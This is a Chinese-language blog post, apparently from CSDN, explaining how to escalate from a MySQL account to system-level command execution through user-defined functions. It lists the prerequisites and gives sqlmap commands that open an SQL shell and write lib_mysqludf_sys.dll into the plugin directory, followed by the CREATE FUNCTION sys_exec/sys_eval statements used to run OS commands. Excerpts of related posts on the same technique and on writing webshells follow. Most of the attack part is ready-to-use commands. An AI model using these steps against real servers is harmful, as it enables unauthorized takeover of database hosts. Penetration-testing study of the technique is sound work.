sqlmap mysql udf提权_利用sqlmap命令--sql-shell进行mysql提权的小方法之udf提权

最新推荐文章于 2024-05-17 08:26:16 发布
最新推荐文章于 2024-05-17 08:26:16 发布
阅读量1.7k 收藏 2
点赞数
文章标签: sqlmap mysql udf提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35861708/article/details/113219188
版权

udf提权

1.原理

UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限

2.利用条件

Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。

Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于

c:winntsystem32。

掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,

具备`root账号所具备的权限的其它账号也可以。

可以将udf.dll写入到相应目录的权限。

1.连接mysql数据打开一个交互shell:

sqlmap.py -u "url" --sql-shell

select @@version;

select @@plugin_dir;

C:XXXX\mysql\mysql5.6.17\lib\plugin\

2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:

sqlmap.py -u "url" --file-write=自己的目录/lib_mysqludf_sys.dll --file-dest=C:XXXX\\mysql\mysql5.6.17\lib\plugin\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

select sys_eval('ver');

江涛校泵
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap mysql udf_Mysql-基于MysqlUDF(Linux系统)
weixin_34696006的博客
01-30 772
基于MysqlUDF(Linux系统)【实验目的】??通过本实验理解如何通过webshell结合sqlmap自带的dll文件对Linux系统进行UDF,熟悉UDF的主要方法。【实验环境】攻击机:Kali-pri用户名college,密码360College目标靶机:CentOS-sqli-lab用户名college,密码360College【实验原理】??scp命令简介:??scp是...
sqlmap mysql udf_利用SQLMAP获取os-shell的过程分析「UDF
weixin_33089993的博客
02-04 1391
结论关于MySQL读写文件的条件限制是老生常谈的问题,由于SQLMAP获取os-shell的两种方法均需要文件写入操作,这里先摆出结论:1、MySQL服务默认以mysql用户限启动,并没有危险目录(/usr/lib64/mysql/plugin[root 755]、/var/www/html[root 755]、/var/spool/cron[root 700]、/root/.ssh[root ...
sql写shell原理_sql注入写入shell的条件
2401_84281655的博客
05-17 757
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要写入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可写限即secure_file_priv = ''配置为空原因是--os-shell参数写入shell使用的是select xx into outfile而secure_file_priv此配置。
sqlmap mysql udf_MySQL数据库UDF
weixin_39683172的博客
01-30 491
UDFUDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。windows下udf的条件·如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/·如果mysql版本小于5.1...
linux下 udf_MYSQL--UDF
weixin_35507450的博客
01-17 1217
前言:udf是通过数据库来实现获取目标的管理员的shell,来达到从低到高限什么是UDFudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REALSTRING ...
mysql 5.6 udf_MySQL udf
weixin_36433730的博客
01-19 357
本来从回来就打算开始写了,结果各种的事情,一直拖到了现在,趁十二点前赶紧完成一下这个的记录,这个是整个内网环境的第二部分,考的是MySQLudf,给的是root限,使用社区已经公开了的方法进行getshell,然后就可以得到数据库的账号密码了,但是这里我设置了外连的IP限制,必须使用web服务器才可以连接数据库。0x01 UDFUDF(user defined function)用户自定义...
MysqlUDF
热门推荐
good good study
11-07 1万+
udf通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql限 —> 系统限。限制条件挺多,如下先获取mysql限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的限,即secure_file_priv的值为空。
mysql udf.dll_SqlMapmysql udf.dll
weixin_42644410的博客
01-19 188
先上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径):select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_m...
mysql 5.5 udf_MySQL_UDF
weixin_31548723的博客
01-27 651
大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。一、原理udf 即 user defined function,文件后缀为.dll。通过在 udf 文件中定义新函数,可以对 mysql 的功能进行扩充,利用 mysql 账号 root 限创建可以执行系统命令函数的 udf.dll ...
kailinux mysql_利用sqlmap进行mysql的小方法(win与liunx通用)
weixin_39952182的博客
12-18 262
文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\wam...
Linux利用UDF库实现Mysql
09-10
本篇将详细介绍如何利用UDF库来实现MySQL操作。 首先,通常涉及到获取更高的系统限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到限的目的。要实现这一过程,我们需要满足以下...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
5. 高级功能:如需执行自定义SQL命令,可以使用`sqlmap -p parameter --sql-shell`进入交互模式。 四、防御SQL注入的策略 1. 输入验证:对用户输入进行严格的过滤和检查,避免非法字符。 2. 参数化查询:使用预...
ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s
09-23
标题 "ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s" 暗示了这是一个关于iBATIS SQLMap的源码包,版本号为2.3.4.741,可能是一个增强或修改后的版本,具有特定的优化和改进。描述中到了针对...
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器的潜在漏洞。在这个"sqlmap自动扫描器.zip"压缩包中,包含...
基于Springboot和Vue的图书借还管理系统源码 图书借还管理系统代码(高分毕设)
07-28
图书借还管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
C语言内存管理:静态与动态分配的较量
07-28
C语言是一种通用的编程语言,由丹尼斯·里奇(Dennis Ritchie)在20世纪70年代早期于美国电话电报公司(AT&T)的贝尔实验室开发。C语言以其高效性、灵活性和可移植性而闻名,它是一种过程式编程语言,供了对底层硬件的直接访问能力。 C语言的特点包括: 1. **简洁高效**:C语言的语法简洁,执行效率高,适合编写系统软件。 2. **接近硬件**:C语言供了对内存地址和位操作的直接控制,使其非常适合硬件级编程。 3. **可移植性**:C语言编写的程序可以在不同的操作系统和硬件平台上编译和运行,具有很好的可移植性。 4. **丰富的库支持**:C语言拥有大量的标准库,如标准输入输出库(stdio.h)、数学库(math.h)等。 5. **结构化编程**:C语言支持结构化编程,允许使用循环、条件判断和函数等控制结构。 6. **指针**:C语言的指针功能强大,可以操作内存地址,实现复杂的数据结构和算法。 7. **编译型语言**:C语言是一种编译型语言,源代码需要通过编译器转换成机器码才能运行。 C语言广泛应用于操作系统(如Unix和Linux)、嵌入式系统、高性能
通讯协议规范-命令包格式
07-28
供一份通讯协议规范,包含命令包、格式等,在上下位机调试的时候可参考该文档,制定对应的通讯协议。
四足宠物机器狗动态步行规划与仿真.pdf
最新发布
07-28
四足宠物机器狗动态步行规划与仿真
如何利用sqlmap--sql-shell
06-11
使用`--sql-shell`选项可以让...请注意,这些命令只是SQLMap获取SQL Shell的基本用法。具体步骤取决于你想要访问的数据库和表。同时,需要强调的是,这种方法只适用于合法的授情况下,任何未经授的访问都是违法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值